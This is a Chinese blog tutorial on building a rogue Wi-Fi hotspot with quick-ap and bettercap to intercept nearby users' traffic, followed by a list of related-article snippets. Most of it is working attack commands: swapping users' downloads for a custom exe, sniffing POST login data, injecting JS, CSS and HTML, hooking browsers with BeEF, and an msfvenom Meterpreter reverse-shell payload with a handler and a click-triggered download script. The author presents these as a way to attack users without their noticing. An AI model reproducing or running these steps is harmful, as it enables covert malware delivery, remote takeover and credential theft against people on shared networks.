环境需求

  1:kali系统 , 2.0版本

  2:quick-ap

  3:bettercap

  4:bettercap-proxy-modules

  5:博客园账号(把zip文件传到博客园的文件服务器)

  主要环境搭建

  目的:替换局域网用户的下载文件,变为我们自己定义的下载文件, 这个文件可以为一个恶意的exe或者apk

  quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules

  在kali系统中插入usb网卡, 默认的网卡为wlan0, 如果网卡名字不一样的话,后面的脚本中所有的wlan0都要改, 不保证kali的新版本可用, 测试环境的kali版本为2.0 

  搭建热点 

  进入quick-ap的目录下, 执行文件,创建热点:

./apd.sh

  重新打开一个窗口, 进入bettercap-proxy-modules/http目录下,执行以下命令, 只要用户有下载exe文件或者其他类型的文件, 都会被替换,替换为我们自定义的exe文件, apk或者, rar文件也可以, 思路很多:

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/file.exe 

    其他

  bettercap-proxy-modules还可以配合beef使用, 修改页面标题, 修改页面样式,嗅探登陆注册的请求信息

修改10. 为  你要攻击的IP
.1为网关的地址

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST : 嗅探信息

---HTTP

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module beefbox.rb --beef-path=/usr/share/beef-xss : 使用beef

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/payload.exe : 设置自定义下载文件

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -T 10.0.0.145 --proxy-module replace_images.rb --httpd-path /root/Desktop : 替换图片

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy-module hack_title.rb : 修改页面标题---JS

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file rainbow.js : 给页面添加一个彩虹

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file resizetext.js : 重新设置页面的字体大小

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file shakescreen.js : 页面图片抖动

--- CSS

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file blurpage.css :  页面模糊

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file flipimages.css : 颠倒图片

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file spinimages.css : 图片旋转
bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file upsidedown.css : 页面颠倒

  bettercap还能实现页面插入css, 插入js, 插入html等功能, 这些东西可以参考bettercap的官网 https://www.bettercap.org/docs/proxying/http.html

InjectJS ( --proxy-module injectjs ) : Used to inject javascript code/files inside HTML pages.
InjectCSS ( --proxy-module injectcss ) : Used to inject CSS code/files inside HTML pages.
InjectHTML ( --proxy-module injecthtml ) : Used to inject HTML code inside HTML pages.

  开始搞事情,入侵你的电脑

  msf创建payload文件

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=10.0.0.0.1 LPORT=1111 -f exe > exe.exe

  把生成的exe压缩, 或者用exebind绑定到其它的exe文件上, 再压缩成zip文件, 传到博客园的文件服务器

  打开msf控制台:

use exploit/multi/handler
set lhost 10.0.0.1
set lport 1111set payload windows/meterpreter/reverse_tcp
exploit

  监听本地端口:

  开始Arp欺骗:bettercap

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module=injecthtml --html-data "<script> document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'} </script>"

  给所有Http页面添加html代码, 只要用户点击的body标签, 就下载一个rar文件, 用户只要运行这个文件, msf就会返回一个shell

  JS代码:document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'}的意思是当用户点击页面的时候,会自动下载文件

  当用户执行了文件以后, msf控制台就有反应了, 6666

  结尾

  相对于使用arp欺骗,用户浏览网页的时候会非常卡

  但是使用自己创建的热点, 可以在用户毫无察觉的情况下, 给用户添加html代码, 结合beef, 那是相当好玩啊

  本文的靶机为自己电脑, 无恶意

  相关

  youku视频:http://v.youku.com/v_show/id_XMjgwMjc2ODI0OA==.html?spm=a2h3j.8428770.3416059.1

  bettercap:https://www.bettercap.org/

  youtube视频:https://www.youtube.com/watch?v=y9OYrK4j4_4
  quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

QQ:287101329

微信:18101055830

QUICK-AP + BETTERCAP 搭建热点, 欺骗局域网内用户下载任意可执行文件的更多相关文章

  1. BeEF 获取同局域网内用户浏览器信息

    1.将kali网络适配器改为桥接模式 打开网络适配器,获取权限 修改桥接模式,进行应用 重启网卡 /etc/init.d/networking restart 查看IP地址 查看网络通不通 2.开启B ...

  2. QUICK-AP + BETTERCAP 替换局域网内其他用户的下载文件为自定义文件

    环境需求 :kali系统 , .0版本 :quick-ap :bettercap :bettercap-proxy-modules :...... 主要环境搭建 目的:替换局域网用户的下载文件,变为我 ...

  3. 中间人攻击-Arp之局域网内DNS欺骗

    基础知识 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. ARP协议 假设A(192.168.1.2)与B(1 ...

  4. cubieboard中使用py-kms与dnsmasq搭建局域网内全自动KMS激活环境

    众所周知,KMS激活方式是当前广大网民“试用”windows,office的最广泛的激活方式.几乎可以用于微软的全线产品. 但是在本机使用KMS类的激活工具总是有些不放心,一方面每隔180天都要重新激 ...

  5. 局域网内yum源搭建

    在一些环境下,服务器不能连接互联网,但是我们又偏偏需要安装一些软件,此时有点麻烦了.通过使用centos镜像文件,搭建yum本地源,局域网内所有服务器都可以连接这一本地源进行软件的下载和安装,下面具体 ...

  6. 树莓派上使用KickThemOut对局域网内的设备进行ARP欺骗

    安装KickThemOut工具 $ git clone https://github.com/k4m4/kickthemout.git $ cd kickthemout/ $ sudo -H pip ...

  7. 在内部局域网内搭建HTTPs

    在内部局域网内搭建HTTPs 配置环境 Windows版本:Windows Server 2008 R2 Standard Service Pack 1 系统类型:       64 位操作系统 内存 ...

  8. 不搭建git服务器对git仓库进行局域网内共享多人合作开发项目

    有时候在一个临时局域网内没有搭建git服务器,但是又想多人开发一个项目,此时只要每个人电脑安装有git客户端,参考一下方法即可尝试建一个本地化的远程仓库进行多人开发工作. 远程仓库通常只是一个裸仓库( ...

  9. 局域网内搭建一个服务器,可以使用 https 吗

    https://www.v2ex.com/t/472394 这是一个创建于 126 天前的主题,其中的信息可能已经有所发展或是发生改变. 局域网内通过嵌入式设备搭建一个轻量级 web 服务,可以仍然使 ...

随机推荐

  1. QT链接数据库

    在介绍QT与数据的链接问题上,我在这里就不介绍关于QT环境与mysql.sqlite3环境的安装步骤了,以下的所有的操作都是建立在你已经安装了所有环境的基础上的.好的,那我们就具体来看一看QT环境中怎 ...

  2. 实时监听input标签输入 实时监听文本框输入 避免中文输入法无法触发onkeyup事件的问题

    前言: 对于实时监听输入,这种需求大多数都是用于一个联想字提醒,智能提醒.大家都知道onkeydown,onkeypress,onkeyup的在监听中文输入法或者右键粘贴的时候都存在一些弊端,不是那么 ...

  3. bzoj1087 [SCOI2005]互不侵犯

    Description 在N×N的棋盘里面放K个国王,使他们互不攻击,共有多少种摆放方案.国王能攻击到它上下左右,以及左上左下右上右下八个方向上附近的各一个格子,共8个格子. Input 只有一行,包 ...

  4. extern用法详解

    1 基本解释 extern可以置于变量或者函数前,以标示变量或者函数的定义在别的文件中,提示编译器遇到此变量和函数时在其他模块中寻找其定义. 另外,extern也可用来进行链接指定. 2 问题:ext ...

  5. 今天打补丁出问题了,害得我组长被扣了1k奖金。

    今天是第三次给mxdw打补丁和打包,外加公司高管说有一个东西必须要今天之内搞定外放. 我当时问策划为什么这么着急?策划说大佬决定的(这种做事方式真的很不习惯).我等屁民加班加点的搞事情,把功能搞出去了 ...

  6. Android自定义评分控件:RatingStarView

    RatingStarView Android自定义的评分控件,类似ProgressBar那样的,使用星星图标(full.half.empty)作为progress标识的评分/打分控件. 效果图 图1: ...

  7. Android开发之布局--RelativeLayout布局

    RelativeLayout 相对布局 true或false属性 Layout_centerHorizontal   当控件位于父控件的横向中间位置 Layout_centerVertical   当 ...

  8. NSA永恒之蓝病毒,如何通过360工具修复?

    简介: NSA武器库的公开被称为是网络世界"核弹危机",其中有十款影响Windows个人用户的黑客工具,包括永恒之蓝.永恒王者.永恒浪漫.永恒协作.翡翠纤维.古怪地鼠.爱斯基摩卷. ...

  9. Linux安装jdk7开发环境

    1.官网 下载jdk7版本 地址: http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-jav ...

  10. ConcurrentHashMap实现原理及源码分析

    ConcurrentHashMap实现原理 ConcurrentHashMap源码分析 总结 ConcurrentHashMap是Java并发包中提供的一个线程安全且高效的HashMap实现(若对Ha ...